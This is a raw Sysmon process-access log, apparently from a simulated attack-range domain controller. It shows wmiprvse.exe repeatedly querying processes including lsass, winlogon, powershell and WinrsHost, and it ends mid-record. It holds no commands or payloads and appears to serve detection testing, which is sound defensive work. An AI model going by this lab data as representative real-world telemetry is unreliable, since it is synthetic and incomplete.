13:54:48.670{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1100-000000009101}1204C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006454Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.670{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006453Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.670{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006452Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.670{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-0F00-000000009101}1144C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006451Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.670{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-0F00-000000009101}1144C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006450Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.670{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-0E00-000000009101}1084C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006449Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.670{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-0E00-000000009101}1084C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006448Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.670{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8540-5FCF-0D00-000000009101}992C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006447Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.670{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8540-5FCF-0D00-000000009101}992C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006446Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.670{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8540-5FCF-0C00-000000009101}596C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006445Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.670{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8540-5FCF-0C00-000000009101}596C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006444Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.670{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006443Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.670{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006442Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.670{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-853E-5FCF-0900-000000009101}784C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006441Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.670{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-853E-5FCF-0900-000000009101}784C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006440Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.576{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A6-5FCF-F300-000000009101}4636C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006439Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.576{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A6-5FCF-F300-000000009101}4636C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006438Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.576{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A6-5FCF-F200-000000009101}748C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006437Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.576{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A6-5FCF-F200-000000009101}748C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006436Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.576{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A6-5FCF-F100-000000009101}4156C:\Windows\system32\cmd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006435Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.576{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A6-5FCF-F100-000000009101}4156C:\Windows\system32\cmd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006434Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.576{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A6-5FCF-F000-000000009101}4836C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006433Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.576{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A6-5FCF-F000-000000009101}4836C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006432Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.576{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A6-5FCF-EF00-000000009101}4148C:\Windows\system32\WinrsHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006431Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.576{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A6-5FCF-EF00-000000009101}4148C:\Windows\system32\WinrsHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DL